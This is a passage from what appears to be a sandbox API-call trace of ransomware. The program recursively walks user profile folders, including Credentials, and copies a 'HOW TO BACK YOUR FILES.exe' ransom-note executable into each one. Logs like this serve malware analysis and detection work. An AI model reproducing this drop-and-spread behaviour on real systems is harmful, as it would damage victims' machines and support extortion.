ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.480] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.480] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.480] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.480] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4258 | out: hHeap=0x2b0000) returned 1 [0042.480] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2400 | out: hHeap=0x2b0000) returned 1 [0042.480] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned 101 [0042.480] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.480] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.480] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.480] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.480] GetLastError () returned 0x0 [0042.480] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.481] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.481] CloseHandle (hObject=0x118) returned 1 [0042.481] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.481] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.481] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.481] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.481] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.481] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.481] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d4180 | out: hHeap=0x2b0000) returned 1 [0042.481] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.481] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned 101 [0042.481] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.481] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.481] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.482] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.482] GetLastError () returned 0x0 [0042.482] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.482] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.482] CloseHandle (hObject=0x118) returned 1 [0042.482] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.482] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.482] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.482] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0042.483] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.483] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned 101 [0042.483] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.483] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.483] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.483] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.483] GetLastError () returned 0x0 [0042.483] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.483] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.483] CloseHandle (hObject=0x118) returned 1 [0042.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.484] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.484] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.484] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.484] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.484] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb3b8 | out: hHeap=0x2b0000) returned 1 [0042.484] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.484] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned 86 [0042.484] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.484] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.484] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.485] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.485] GetLastError () returned 0x0 [0042.485] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.485] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.485] CloseHandle (hObject=0x118) returned 1 [0042.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.485] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.485] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.485] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.485] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.485] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbaf0 | out: hHeap=0x2b0000) returned 1 [0042.485] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.485] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 126 [0042.485] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.485] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.485] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.486] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.486] GetLastError () returned 0x0 [0042.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.486] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.486] CloseHandle (hObject=0x118) returned 1 [0042.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.486] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.486] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.486] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.486] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.487] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbaf0 | out: hHeap=0x2b0000) returned 1 [0042.487] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0042.487] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 137 [0042.487] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0042.487] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.487] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.487] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.487] GetLastError () returned 0x0 [0042.487] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.487] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.487] CloseHandle (hObject=0x118) returned 1 [0042.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.488] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.488] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.488] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.488] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.488] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0042.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0042.488] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned 103 [0042.488] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0042.488] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.488] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.489] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.489] GetLastError () returned 0x0 [0042.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.489] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.489] CloseHandle (hObject=0x118) returned 1 [0042.489] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f8fb0 | out: hHeap=0x2b0000) returned 1 [0042.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.489] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.489] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.490] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials" [0042.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0042.490] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Microsoft\\Credentials") returned 92 [0042.490] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application 